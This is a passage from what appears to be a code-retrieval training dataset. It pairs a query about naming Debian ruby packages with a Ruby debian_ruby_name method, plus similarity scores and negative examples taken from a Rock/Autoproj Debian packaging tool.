"def create_arch_package(arch, arch_dir, src_dir, out_dir, pack_config)\n # Load manifest\n manifest = YAML.load_file(\"#{src_dir}/manifest.yaml\")\n manifest['arch'] = arch\n name = manifest['name']\n version = manifest['version']\n info \"Packing #{src_dir} (#{arch})\"\n\n npk = \"#{out_dir}/#{name}-#{arch}-#{version}.npk\"\n\n # TODO: do this seperatly\n # Remove existing containers\n Dir.glob(\"#{out_dir}/#{name}-#{arch}-*\").each { |c| FileUtils.rm(c, :verbose => false) }\n\n create_npk(src_dir, npk, manifest, arch_dir, pack_config)\n\n # Update/Create version list\n version_info_path = File.join(out_dir, \"packages-#{arch}.yaml\")\n update_version_list(version_info_path, name, version)\nend",
"def product_name\n name? ? name : [product.name, sub_name].reject{ |a| a.strip.length == 0 }.join(' - ')\n end"
] | [
"0.79385996",
"0.7263144",
"0.71180815",
"0.70813316",
"0.7042691",
"0.7033252",
"0.6661746",
"0.6645817",
"0.66052526",
"0.6584799",
"0.65558136",
"0.64697367",
"0.6411772",
"0.6375237",
"0.6351443",
"0.6343119",
"0.63246405",
"0.6296833",
"0.6254793",
"0.62546974",
"0.6228731",
"0.6209953",
"0.6140385",
"0.611127",
"0.60539925",
"0.6050726",
"0.60455334",
"0.60399544",
"0.60262525",
"0.60261923",
"0.60243404",
"0.5996383",
"0.5996383",
"0.5906256",
"0.5892529",
"0.58892155",
"0.58888936",
"0.588427",
"0.58613104",
"0.5852702",
"0.5819525",
"0.58163416",
"0.5806628",
"0.57822543",
"0.57652646",
"0.5754148",
"0.57496154",
"0.57473546",
"0.5744428",
"0.5729098",
"0.5723797",
"0.5715465",
"0.57128274",
"0.56958216",
"0.5669866",
"0.56571317",
"0.5638531",
"0.5632577",
"0.56121457",
"0.55837995",
"0.5578796",
"0.55608606",
"0.55521566",
"0.55370474",
"0.5530519",
"0.55050784",
"0.5497422",
"0.5497422",
"0.5489798",
"0.5474623",
"0.54739153",
"0.5460413",
"0.54408765",
"0.54328406",
"0.5432169",
"0.5430534",
"0.54231334",
"0.54089403",
"0.5403523",
"0.5397685",
"0.53768873",
"0.5333744",
"0.5333744",
"0.52853805",
"0.52822846",
"0.52796346",
"0.5279322",
"0.5270197",
"0.52626115",
"0.52605176",
"0.5255885",
"0.52556145",
"0.5252988",
"0.5242106",
"0.52376217",
"0.52359444",
"0.5231281",
"0.5229881",
"0.5224871",
"0.5214588"
] | 0.8442843 | 0 |
The debian name of a meta package, rock-[release-name]-meta-[name]; the release-name prefix can be avoided by setting with_rock_release_prefix to false | def debian_meta_name(name, with_rock_release_prefix = true)
if with_rock_release_prefix
rock_release_prefix + "meta-" + Deb.canonize(name)
else
pkg_prefix_base + "meta-" + Deb.canonize(name)
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def debian_name(pkg)\n if pkg.kind_of?(Autoproj::RubyPackage)\n debian_ruby_name(pkg.name)\n else\n \"rock-\" + canonize(pkg.name)\n end\n end",
"def rock_release_prefix(release_name = nil)\n release_name ||= rock_release_name\n if release_name\n pkg_prefix_base + \"-#{release_name}-\"\n else\n pkg_prefix_base + \"-\"\n end\n end",
"def debian_name(pkginfo, with_rock_release_prefix = true, release_name = nil)\n if pkginfo.kind_of?(String)\n raise ArgumentError, \"method debian_name expects a PackageInfo as argument, got: #{pkginfo.class} '#{pkginfo}'\"\n end\n name = pkginfo.name\n\n debianize_name(name,\n build_type: pkginfo.build_type,\n with_rock_release_prefix: with_rock_release_prefix,\n release_name: release_name)\n end",
"def debianize_name(name, build_type: :cmake, with_rock_release_prefix: true, release_name: rock_release_name)\n if build_type == :ruby\n if with_rock_release_prefix\n rock_release_prefix(release_name) + \"ruby-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"-ruby-\" + Deb.canonize(name)\n end\n else\n if with_rock_release_prefix\n rock_release_prefix(release_name) + Deb.canonize(name)\n else\n pkg_prefix_base + \"-\" + Deb.canonize(name)\n end\n end\n end",
"def debian_ruby_name(name, with_rock_release_prefix = true, release_name = nil)\n if with_rock_release_prefix\n rock_ruby_release_prefix(release_name) + Deb.canonize(name)\n else\n \"ruby-\" + Deb.canonize(name)\n end\n end",
"def package_name\n @version ? \"#{@name}-#{@version}\" : @name\n end",
"def package_name\n @package_name ||=\n Pathname(\"#{cartage.final_name}.tar#{cartage.tar_compression_extension}\")\n end",
"def package_name\n # TODO: verify renamed packages\n resource['title']\n end",
"def rock_ruby_release_prefix(release_name = nil)\n rock_release_prefix(release_name) + \"ruby-\"\n end",
"def built_rpm_names(build)\n build.\n # Just names from the rpms without nvr info\n brew_rpms.map(&:name_nonvr).\n # Remove any duplicates\n uniq.\n # Filter out any debuginfo names\n reject{ |name| name =~ /debuginfo/ }.\n # Remove prefixes if there are any for this product. (Mainly for SCL, see Bug 1003719)\n map { |name| BrewRpmNamePrefix.strip_using_list_of_prefixes(@errata.product.brew_rpm_name_prefixes, name) }\n end",
"def native_dependency_name(name, selected_platform = nil)\n if !selected_platform\n selected_platform = @packager.target_platform\n end\n\n # Identify this rock release and its ancestors\n this_rock_release = TargetPlatform.new(@packager.rock_release_name, selected_platform.architecture)\n\n if name.is_a? String\n # Check for 'plain' name, the 'unprefixed' name and for the 'release' name\n if this_rock_release.ancestorContains(name) ||\n selected_platform.contains(name)\n # direct name match always is an os dependency\n # it can never be in a rock release\n return [name, true]\n end\n\n # try debian naming scheme for ruby\n if this_rock_release.ancestorContains(\"ruby-#{Deb.canonize(name)}\") ||\n selected_platform.contains(\"ruby-#{Deb.canonize(name)}\")\n return [\"ruby-#{Deb.canonize(name)}\", true]\n end\n\n # otherwise, ask for the ancestor that contains a rock ruby\n # package\n ancestor_release_name = this_rock_release.releasedInAncestor(\n @packager.debian_ruby_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release_name.empty?\n return [@packager.debian_ruby_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_ruby_name(name, true), false]\n else\n # ask for the ancestor that contains a rock ruby\n # package\n ancestor_release = this_rock_release.releasedInAncestor(\n @packager.debian_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release.empty?\n return [@packager.debian_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_name(name, true), false]\n end\n end",
"def package_name(project)\n \"#{project.name}-#{project.version}-#{project.release}.#{@architecture}.pkg.gz\"\n end",
"def package_name(buildno=nil)\n if buildno\n buildno = Time.now.strftime(\"%H*60+%M\")\n versnum = \"#{version}.#{buildno}\"\n else\n versnum = version\n end\n\n if platform\n \"#{name}-#{versnum}-#{platform}\"\n else\n \"#{name}-#{versnum}\"\n end\n end",
"def release_name\n return nil unless @data['name'] && @data['version']\n [ dashed_name, @data['version'] ].join('-')\n end",
"def package_filename\n \"#{@package.name}_#{@package.version}_#{@package.architecture}.deb\"\n end",
"def package_name\n name = package_drop_last(slug_parts)\n name.empty? ? '_root_' : name\n end",
"def package_name\n ver = if new_resource.version == 'latest'\n package_metadata[:version]\n else\n new_resource.version\n end\n \"Chef Development Kit v#{ver}\"\n end",
"def detailed_name\n \"#{label} ( #{name}_V#{version} )\"\n end",
"def original_name # :nodoc:\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{@name}-#{@version}\"\n else\n \"#{@name}-#{@version}-#{@original_platform}\"\n end\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil? then\n \"#{name}-#{version}\".untaint\n else\n \"#{name}-#{version}-#{platform}\".untaint\n end\n end",
"def filtered_dependencies(pkginfo, with_rock_release_prefix = true)\n target_platform = @packager.target_platform\n this_rock_release = TargetPlatform.new(@packager.rock_release_name, target_platform.architecture)\n\n deps_rock_pkginfos = pkginfo.dependencies[:rock_pkginfo].dup\n deps_osdeps_packages = pkginfo.dependencies[:osdeps].dup\n non_native_dependencies = pkginfo.dependencies[:nonnative].dup\n\n if target_platform.distribution_release_name\n # CASTXML vs. GCCXML in typelib\n if pkginfo.name =~ /typelib$/\n # add/remove the optional dependencies on the\n # rock-package depending on the target platform\n # there are typelib versions with and without the\n # optional depends. we know which platform requires\n # a particular dependency.\n deps_rock_pkginfos.delete_if do |pkginfo|\n pkginfo.name == \"castxml\" || pkginfo.name == \"gccxml\"\n end\n\n if target_platform.contains(\"castxml\")\n deps_osdeps_packages.push(\"castxml\")\n elsif target_platform.contains(\"gccxml\")\n #todo: these need to checked on the other platforms\n deps_osdeps_packages.push(\"gccxml\")\n else\n raise ArgumentError, \"TargetPlatform: #{target_platform} does neither support castxml nor gccml - cannot build typelib\"\n end\n end\n\n # Filter out optional packages, e.g. llvm and clang for all platforms where not explicitly available\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n result = true\n Packaging::Config.packages_optional.each do |pkg_name|\n regex = Regexp.new(pkg_name)\n if regex.match(name)\n result = target_platform.contains(name)\n end\n end\n result\n end\n\n # Filter out excluded packages, e.g. libqwt5-qt4-dev\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n result = true\n Packaging::Config.packages_excluded.each do |pkg_name|\n regex = Regexp.new(pkg_name)\n if regex.match(name)\n Packager.info \"#{pkginfo.name} excluding osdeps #{pkg_name} as dependency\"\n result = false\n end\n end\n result\n end\n\n # Filter ruby versions out -- we assume chroot has installed all\n # ruby versions\n #\n # This is a workaround, since the information about required packages\n # comes from the build server platform and might not correspond\n # with the target platform\n #\n # Right approach: bootstrap within chroot and generate source packages\n # in the chroot\n #deps_osdeps_packages = deps[:osdeps].select do |name|\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n name !~ /^ruby[0-9][0-9.]*/\n end\n\n # Prefer package of the OS for gems if they are available there\n #deps_nonnative_packages = deps[:nonnative].map do |name, version|\n non_native_dependencies = non_native_dependencies.map do |name, version|\n dep_name,is_osdep = native_dependency_name(name)\n # if with_rock_release_prefix is given all packages 'have to be'\n # os dependencies, otherwise it triggers further resolution of nonnative packages\n # which cannot exist (in resolve_all)\n if is_osdep || with_rock_release_prefix\n deps_osdeps_packages << dep_name\n nil\n else\n name\n end\n end.compact\n end\n\n deps_rock_packages = deps_rock_pkginfos.map do |pkginfo|\n debian_name = @packager.debian_name(pkginfo, with_rock_release_prefix)\n this_rock_release.packageReleaseName(debian_name)\n end.sort\n\n Packager.info \"'#{pkginfo.name}' with (available) rock package dependencies: '#{deps_rock_packages}'\"\n Packager.info \"'#{pkginfo.name}' with (available) osdeps dependencies: '#{deps_osdeps_packages}'\"\n\n # Return rock packages, osdeps and non native deps (here gems)\n {:rock => 
deps_rock_packages, :osdeps => deps_osdeps_packages, :nonnative => non_native_dependencies }\n end",
"def full_name\n \"#{@name}-#{@version}\"\n end",
"def package_name\n [self.config.organization, self.config.project_name].compact.collect(&:underscore).join('-')\n end",
"def full_name\n \"#{@package}.#{parameterized_name}\"\n end",
"def release_manifest_name\n \"#{name}-release-manifest\"\n end",
"def fmri_package_name\n version = project.build_version.split(/[^\\d]/)[0..2].join(\".\")\n platform = Ohai[\"platform_version\"]\n \"#{safe_base_package_name}@#{version},#{platform}-#{project.build_iteration}\"\n end",
"def package_name\n raise NotImplementedError\n end",
"def default_container_name\n full_release_name.gsub('_', '-')\n end",
"def vendored_package_name(package)\n\tFile.join($package_name, 'vendor/src', package)\nend",
"def package_name\n raise Puppet::Error, 'luet requires packages have a category set' unless @resource[:category]\n\n \"#{@resource[:category]}/#{@resource[:name]}\"\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{name}-#{version}\".dup.tap(&Gem::UNTAINT)\n else\n \"#{name}-#{version}-#{platform}\".dup.tap(&Gem::UNTAINT)\n end\n end",
"def prefixed_label(package)\n label = ( package =~ /^#{$prefix}(.*)$/ ) && $1 || package\n label = '.' if label.empty?\n label\nend",
"def full_name\n \"#{spec.name}-#{spec.version}\"\n end",
"def hadoop_package(name)\n return name unless hdp22?\n return name if node['platform_family'] == 'debian'\n fw = name.split('-').first\n pv = hdp_version.tr('.', '_').tr('-', '_')\n nn = \"#{fw}_#{pv}\"\n name.gsub(fw, nn)\n end",
"def rpm_package_information\n super\n end",
"def get_pkg_name(candidate_tag=nil, distro=nil)\n prod_name = self.task.prod\n\n # FIXME: stop that hardcoding... one day!\n pkg_name = self.name\n\n distro = self.task.distros[0] if distro.nil?\n\n is_scl_package = MeadSchedulerService.is_scl_package?(prod_name, self.name)\n # different naming convention for different products\n if prod_name == \"eap6\" && distro == 'el7' && is_scl_package\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n\n # Only enable scl thing for RHEL distros, aka when distro = el_\n elsif is_scl_package && distro.match(/^el/)\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n end\n pkg_name\n end",
"def set_dpkg_package_name(name)\n dpkg_package.name name\n dpkg_package.package_name name\n end",
"def package_meta(name, depend,\n version: \"0.1\",\n force_update: false,\n distribution: nil,\n architecture: nil)\n\n debian_pkg_name = debian_meta_name(name)\n\n if force_update\n dirname = packaging_dir(debian_pkg_name)\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n distribution ||= target_platform.distribution_release_name\n architecture ||= target_platform.architecture\n packaging_dir = packaging_dir(debian_pkg_name)\n\n if not File.directory?(packaging_dir)\n FileUtils.mkdir_p packaging_dir\n end\n\n package_deb_meta(name, depend,\n version: version,\n distribution: distribution,\n packaging_dir: packaging_dir)\n end",
"def rpm_no_arch\n @rpm_no_arch\n end",
"def to_s\n \"#{@distro.capitalize} #{@product.gsub(/_/, ' ').capitalize} #{@version}\"\n end",
"def spec_name\n \"#{full_name}.gemspec\"\n end",
"def platform_shortname\n if rhel?\n if \"rocky\" == Ohai[\"platform\"]\n \"rocky\"\n else\n \"el\"\n end\n elsif suse?\n \"sles\"\n else\n Ohai[\"platform\"]\n end\n end",
"def package_name\n if supports_ports?\n if makefile_variable_value(\"PKGNAME\", port_path) =~ /^(.+)-[^-]+$/\n $1\n else\n raise Chef::Exceptions::Package, \"Unexpected form for PKGNAME variable in #{port_path}/Makefile\"\n end\n else\n new_resource.package_name\n end\n end",
"def StripReleaseNo(pkg_name)\n build_no_pos = Builtins.findlastof(pkg_name, \"-\") # find trailing build no.\n\n if build_no_pos != nil && Ops.greater_than(build_no_pos, 0)\n # cut off trailing build no.\n pkg_name = Builtins.substring(pkg_name, 0, build_no_pos)\n end\n\n pkg_name\n end",
"def native_release_packages\n @attributes[:native_release_packages]\n end",
"def native_pkg_to_install_string(pkg)\n name = pkg[:metadata][:name]\n version = pkg[:metadata][:version]\n package_version = pkg[:metadata][:package_version]\n pkgname = \"#{name}-#{version}\"\n if package_version\n pkgname << \"-#{package_version}\"\n end\n pkgname\n end",
"def rpm_family_and_version\n if Pkg::Config.vanagon_project\n Pkg::Config.rpm_targets.split(' ').map do |target|\n rpm_el_family, rpm_el_version, = target.split('-')\n \"#{rpm_el_family}-#{rpm_el_version}\"\n end\n else\n Pkg::Config.final_mocks.split.map { |mock| \"#{mock_el_family(mock)}-#{mock_el_ver(mock)}\" }\n end\nend",
"def dcv_package\n \"nice-dcv-#{node['cluster']['dcv']['version']}-#{node['cluster']['base_os']}-#{dcv_url_arch}\"\nend",
"def key\n \"gem-package-#{name}\"\n end",
"def title\n \"#{artist.name} - #{name} [#{release.catalog_number}]\"\n end",
"def fix_name(name)\n if name.start_with?(\"python\")\n # If the python package is called \"python-foo\" strip the \"python-\" part while\n # prepending the package name prefix.\n return [attributes[:python_package_name_prefix], name.gsub(/^python-/, \"\")].join(\"-\")\n else\n return [attributes[:python_package_name_prefix], name].join(\"-\")\n end\n end",
"def package_basename(extension='.gem')\n [ package_name, version ].join('-') + extension\n end",
"def source_name\n 'Archives & Manuscripts'\n end",
"def repository_name\n @repository_name ||= \"#{project_name}-boshrelease\"\n end",
"def bot_short_name_without_version(pr)\n bot_short_name(pr).sub(/_v\\d*$/, '_v')\n end",
"def pcb_display_name\n name = self.pcb_name\n name += ' ' + self.pcb_revision if self.pcb_revision.size > 0\n name\n end",
"def version_file_from( name )\n\t\treturn name.\n\t\t\tsplit( /-/ ).\n\t\t\treject {|word| PACKAGE_IGNORE_WORDS.include?(word) }.\n\t\t\tjoin( '/' )\n\tend",
"def release(options)\n options = options.rekey\n\n unixname = self.unixname\n\n package = options[:package] || metadata.name\n version = options[:version] || metadata.version\n\n date = options[:date] || metadata.released || Time::now.strftime('%Y-%m-%d %H:%M')\n\n changes = options[:changes] || project.history.releases[0].changes\n notes = options[:notes] || project.history.releases[0].note\n\n release = options[:release] || version\n\n files = options[:files] || options[:file] || []\n\n #store = options[:store] || 'pkg'\n\n processor = options[:processor] || 'Any'\n\n is_public = !options[:private]\n\n #raise ArgumentError, \"missing unixname\" unless unixname\n raise ArgumentError, \"missing package\" unless package\n raise ArgumentError, \"missing release\" unless release\n\n # package name has to be 3+ characters.\n if package.size < 3\n package = package + \"'s\"\n end\n\n # sub in for version if %s is used in release name.\n release = release % version if release.index(\"%s\")\n\n release_notes = notes\n release_changes = changes\n\n # Gather package files to release.\n if files.empty?\n files = find_packages(version)\n else\n files = files.map do |file|\n if File.directory?(file)\n find_packages(version, file)\n else\n file\n end\n end\n files = files.flatten\n end\n files = files.select{ |f| File.file?(f) }\n\n abort \"No package files.\" if files.empty?\n\n files.each do |file|\n abort \"Not a file -- #{file}\" unless File.exist?(file)\n puts \"Release file: #{File.basename(file)}\"\n end\n\n # which package types\n #rtypes = [ 'tgz', 'tbz', 'tar.gz', 'tar.bz2', 'deb', 'gem', 'ebuild', 'zip' ]\n #rtypes -= exclude\n #rtypes = rtypes.collect{ |rt| Regexp.escape( rt ) }\n #re_rtypes = Regexp.new('[.](' << rtypes.join('|') << ')$')\n\n puts \"Releasing #{package} #{release} to #{unixname} project...\" #unless options['quiet']\n\n login do\n\n raise ArgumentError, \"missing group_id\" unless group_id\n\n unless package_id = package?(package)\n if trial?\n puts \"Package '#{package}' does not exist.\"\n puts \"Create package #{package}.\"\n abort \"Cannot continue in trial mode.\"\n else\n #unless options['force']\n q = \"Package '#{package}' does not exist. Create?\"\n a = ask(q, 'yN')\n abort \"Task canceled.\" unless ['y', 'yes', 'okay'].include?(a.downcase)\n #end\n puts \"Creating package #{package}...\"\n create_package(package, is_public)\n unless package_id = package?(package)\n raise \"Package creation failed.\"\n end\n end\n end\n if release_id = release?(release, package_id)\n #unless options[:force]\n if trial?\n puts \"Release #{release} already exists.\"\n else\n q = \"Release #{release} already exists. 
Re-release?\"\n a = ask(q, 'yN')\n abort \"Task canceled.\" unless ['y', 'yes', 'okay'].include?(a.downcase)\n #puts \"Use -f option to force re-release.\"\n #return\n end\n files.each do |file|\n fname = File.basename(file)\n if file_id = file?(fname, package)\n if trial?\n puts \"Remove file #{fname}.\"\n else\n puts \"Removing file #{fname}...\"\n remove_file(file_id, release_id, package_id)\n end\n end\n if trial?\n puts \"Add file #{fname}.\"\n else\n puts \"Adding file #{fname}...\"\n add_file(file, release_id, package_id, processor)\n end\n end\n else\n if trial?\n puts \"Add release #{release}.\"\n else\n puts \"Adding release #{release}...\"\n add_release(release, package_id, files,\n :processor => processor,\n :release_date => date,\n :release_changes => release_changes,\n :release_notes => release_notes,\n :preformatted => '1'\n )\n unless release_id = release?(release, package_id)\n raise \"Release creation failed.\"\n end\n end\n #files.each do |file|\n # puts \"Added file #{File.basename(file)}.\"\n #end\n end\n end\n puts \"Release complete!\" unless trial?\n end",
"def package_name(val = NULL_ARG)\n @package_name = val unless val.equal?(NULL_ARG)\n @package_name.nil? ? @name : @package_name\n end",
"def server_pkg_name\n platform_family?('debian') ? \"postgresql-#{new_resource.version}\" : \"postgresql#{new_resource.version.delete('.')}-server\"\n end",
"def manifest_name(name, pack_type)\n name.chomp(\".#{pack_type}\")\n end",
"def meta_description\n # Change the value below between the quotes.\n \"File Repository for EZ Troubleshooter\"\n end",
"def name\n return \"LA100QAQC\"\n end",
"def getNameForPrecompiled\n sanitizeForPath(\"#{@Name}_#{@Version}_\" +\n (@BranchEpoch ? \"sv_#{@BranchEpoch}_\" : '') +\n \"opts_#{optionsHash}\")\n end",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def hadoop_package(name)\n return name unless hdp22? || iop?\n return name if node['platform_family'] == 'debian'\n fw =\n if name == 'spark-core'\n name\n else\n name.split('-').first\n end\n pv =\n if hdp22?\n hdp_version.tr('.', '_').tr('-', '_')\n else\n node['hadoop']['distribution_version'].tr('.', '_')\n end\n nn = \"#{fw}_#{pv}\"\n name.gsub(fw, nn)\n end",
"def product_name; end",
"def safe_base_package_name\n if project.package_name =~ /\\A[a-z0-9\\.\\+\\-]+\\z/\n project.package_name.dup\n else\n converted = project.package_name.downcase.gsub(/[^a-z0-9\\.\\+\\-]+/, \"-\")\n\n log.warn(log_key) do\n \"The `name' component of IPS package names can only include \" \\\n \"lowercase alphabetical characters (a-z), numbers (0-9), dots (.), \" \\\n \"plus signs (+), and dashes (-). Converting `#{project.package_name}' to \" \\\n \"`#{converted}'.\"\n end\n converted\n end\n end",
"def apt_packages\n PRE_INSTALLED_OS_PACKAGES[@app.release].join(\" #{NL_TAB}\")\n end",
"def name\n return item_info.name + quality_txt\n end",
"def fully_qualified_name\n return \".#{self.package}\"\n end",
"def package_set_name(path, branch='master')\n file = dir_git(path,branch,/source\\.yml/)\n raw = raw_file_from_git(path,file[0])\n yaml = YAML.load(raw)\n yaml[\"name\"]\n end",
"def file_name\n \"#{full_name}.gem\"\n end",
"def name\n return 'Generic QAQC'\n end",
"def generate_debian_dir_meta(name, depends, base_dir: Dir.pwd, version: \"0.1\", distribution: nil)\n existing_debian_dir = File.join(\"#{name}-#{version}\",\"debian-meta\")\n template_dir =\n if File.directory?(existing_debian_dir)\n existing_debian_dir\n else\n TEMPLATES_META\n end\n\n dir = File.join(base_dir, \"debian\")\n FileUtils.mkdir_p dir\n debian_name = debian_meta_name(name)\n debian_version = \"#{version}\"\n if distribution\n debian_version += '~' + distribution\n end\n\n deps_rock_packages = depends\n deps_osdeps_packages = []\n deps_nonnative_packages = []\n\n Packager.info \"Required OS Deps: #{deps_osdeps_packages}\"\n Packager.info \"Required Nonnative Deps: #{deps_nonnative_packages}\"\n\n Find.find(template_dir) do |path|\n next if File.directory?(path)\n template = ERB.new(File.read(path), nil, \"%<>\", path.gsub(/[^w]/, '_'))\n begin\n rendered = template.result(binding)\n rescue\n puts \"Error in #{path}:\"\n raise\n end\n\n target_path = File.join(dir, Pathname.new(path).relative_path_from(Pathname.new(template_dir)).to_s)\n FileUtils.mkdir_p File.dirname(target_path)\n File.open(target_path, \"w\") do |io|\n io.write(rendered)\n end\n end\n\n return dir\n end",
"def package_name(val = NULL)\n if null?(val)\n @package_name || name\n else\n @package_name = val\n end\n end",
"def dmg_package_app\n case new_resource.source\n when :direct\n ::File.basename(package_metadata[:url], '.dmg')\n else\n ::File.basename(new_resource.source.to_s, '.dmg')\n end\n end",
"def image_name_with_specified_version(version)\n @registry.nil? ? \"#{@name}:#{version}\" : \"#{@registry}/#{@name}:#{version}\"\n end",
"def product_name\n return product_presentation.name if product_presentation\n return \"\"\n end",
"def to_name\n \"#{MAJOR}_#{MINOR}_#{REVISION}\"\n end",
"def to_name\n \"#{MAJOR}_#{MINOR}_#{REVISION}\"\n end",
"def live_name\n [\n transformed_part('product'),\n middle_name(standalone: false), # Will have word dividers on either side\n idx,\n maybe_upto,\n '-',\n parts['sku'] =~ /editorial/ && bang? ? 'square-' : nil,\n [name_base, ext_name].join\n ].compact.join\n end",
"def type_and_version\n self.name.gsub(\"#{Licensed::Sources.name}::\", \"\")\n .gsub(/([A-Z\\d]+)([A-Z][a-z])/, \"\\\\1_\\\\2\".freeze)\n .gsub(/([a-z\\d])([A-Z])/, \"\\\\1_\\\\2\".freeze)\n .downcase\n .split(\"::\")\n end",
"def title\n repo = (repository && repository.identifier.present?) ? \" (#{repository.identifier})\" : ''\n comm = short_comments.blank? ? '' : (': ' + short_comments)\n \"#{l(:label_revision)} #{format_identifier}#{repo}#{comm}\"\n end",
"def mpc_name\n File.join(self.recipe_file.path, @mpc_id + '.mpc')\n end",
"def name_pri\n puts \"\\nPrint Names:\"\n @apks.each do |apk|\n puts apk.fname\n end\n end",
"def modulename\n \"vds\"\n end",
"def key_for_package(pkg)\n if !pkg.id.nil?\n \"#{pkg.id}-#{@name}\"\n else\n return \"#{pkg.categories.split.first}/#{pkg.name}-#{@name}\"\n end\n end",
"def old_filename() \n\t\t \t\treturn @podspec + \"_old\"\n\t\t \tend",
"def package_repository(package_name, desired_version, arch = nil)\n package(package_name, arch, true, false) do |pkg|\n return pkg.repoid if desired_version == pkg.version.to_s\n end\n\n nil\n end",
"def installer_filename\n if PRE_RELEASE\n \"puppet-enterprise-#{pe_version}-el-7-x86_64.tar\"\n else\n \"puppet-enterprise-#{pe_version}-el-7-x86_64.tar.gz\"\n end\nend",
"def get_linux_distro_version_codename\n version_codename_regex = /^VERSION_CODENAME=\\W*(\\w+)\\W*/\n File.open('/etc/os-release') do |release_file|\n release_file.each do |line|\n return line.match(version_codename_regex)[1].downcase if line =~ version_codename_regex\n end\n end\n ''\n end",
"def jurisdiction_name oc_code\n oc_code = \"oc_#{oc_code}\" unless oc_code.to_s.match?(/^oc_/)\n Card.fetch_name oc_code.to_sym\nend",
"def getsfLma__PackageObjName\r\n\t\t\treturn \"sfLma__Package__c\"\r\n\t\tend",
"def drop_prefix(repo)\n repo.split('-')[1].to_s.capitalize\nend",
"def fedora_name\n 'image_file'\n end",
"def pcba_display_name\n name = self.pcba_name\n name += ' ' + self.pcba_revision if self.pcba_revision.size > 0\n name\n end"
] | [
"0.7454804",
"0.7094609",
"0.7083253",
"0.69993",
"0.6651239",
"0.6450723",
"0.6414287",
"0.6396047",
"0.6259771",
"0.62469524",
"0.6229925",
"0.62116957",
"0.6173754",
"0.601299",
"0.6005974",
"0.5993302",
"0.5990938",
"0.58022726",
"0.5784182",
"0.578295",
"0.57796746",
"0.5779416",
"0.5745149",
"0.57385975",
"0.5692017",
"0.56839764",
"0.5676268",
"0.5675612",
"0.56447953",
"0.561208",
"0.56034046",
"0.55801654",
"0.55325323",
"0.5531143",
"0.55161136",
"0.5485817",
"0.5473485",
"0.5413597",
"0.54121625",
"0.54091007",
"0.5404415",
"0.5384629",
"0.53568256",
"0.53547806",
"0.53389174",
"0.53275526",
"0.53269583",
"0.53227115",
"0.53208566",
"0.5316243",
"0.52691364",
"0.526721",
"0.5264272",
"0.52616274",
"0.5247142",
"0.52358174",
"0.52336913",
"0.5228894",
"0.52222854",
"0.52143526",
"0.5212653",
"0.5209908",
"0.5195862",
"0.51715976",
"0.5170757",
"0.5170757",
"0.5170757",
"0.5170757",
"0.5169243",
"0.51630884",
"0.51475334",
"0.51419705",
"0.5137144",
"0.513671",
"0.5133106",
"0.513299",
"0.5132559",
"0.512904",
"0.51283157",
"0.51192605",
"0.5106043",
"0.50915736",
"0.5089853",
"0.5089853",
"0.5087427",
"0.50824076",
"0.5058975",
"0.5051537",
"0.50506765",
"0.5048437",
"0.5041652",
"0.50348663",
"0.50338835",
"0.5033409",
"0.50324863",
"0.5031251",
"0.503058",
"0.5028353",
"0.50242126",
"0.5024012"
] | 0.8754608 | 0 |
The debian name of a ruby package, rock-[release-name]-ruby-[name]; the release-name prefix can be avoided by setting with_rock_release_prefix to false | def debian_ruby_name(name, with_rock_release_prefix = true, release_name = nil)
if with_rock_release_prefix
rock_ruby_release_prefix(release_name) + Deb.canonize(name)
else
"ruby-" + Deb.canonize(name)
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def debian_name(pkg)\n if pkg.kind_of?(Autoproj::RubyPackage)\n debian_ruby_name(pkg.name)\n else\n \"rock-\" + canonize(pkg.name)\n end\n end",
"def debian_meta_name(name, with_rock_release_prefix = true)\n if with_rock_release_prefix\n rock_release_prefix + \"meta-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"meta-\" + Deb.canonize(name)\n end\n end",
"def debianize_name(name, build_type: :cmake, with_rock_release_prefix: true, release_name: rock_release_name)\n if build_type == :ruby\n if with_rock_release_prefix\n rock_release_prefix(release_name) + \"ruby-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"-ruby-\" + Deb.canonize(name)\n end\n else\n if with_rock_release_prefix\n rock_release_prefix(release_name) + Deb.canonize(name)\n else\n pkg_prefix_base + \"-\" + Deb.canonize(name)\n end\n end\n end",
"def rock_release_prefix(release_name = nil)\n release_name ||= rock_release_name\n if release_name\n pkg_prefix_base + \"-#{release_name}-\"\n else\n pkg_prefix_base + \"-\"\n end\n end",
"def rock_ruby_release_prefix(release_name = nil)\n rock_release_prefix(release_name) + \"ruby-\"\n end",
"def debian_name(pkginfo, with_rock_release_prefix = true, release_name = nil)\n if pkginfo.kind_of?(String)\n raise ArgumentError, \"method debian_name expects a PackageInfo as argument, got: #{pkginfo.class} '#{pkginfo}'\"\n end\n name = pkginfo.name\n\n debianize_name(name,\n build_type: pkginfo.build_type,\n with_rock_release_prefix: with_rock_release_prefix,\n release_name: release_name)\n end",
"def package_name\n @package_name ||=\n Pathname(\"#{cartage.final_name}.tar#{cartage.tar_compression_extension}\")\n end",
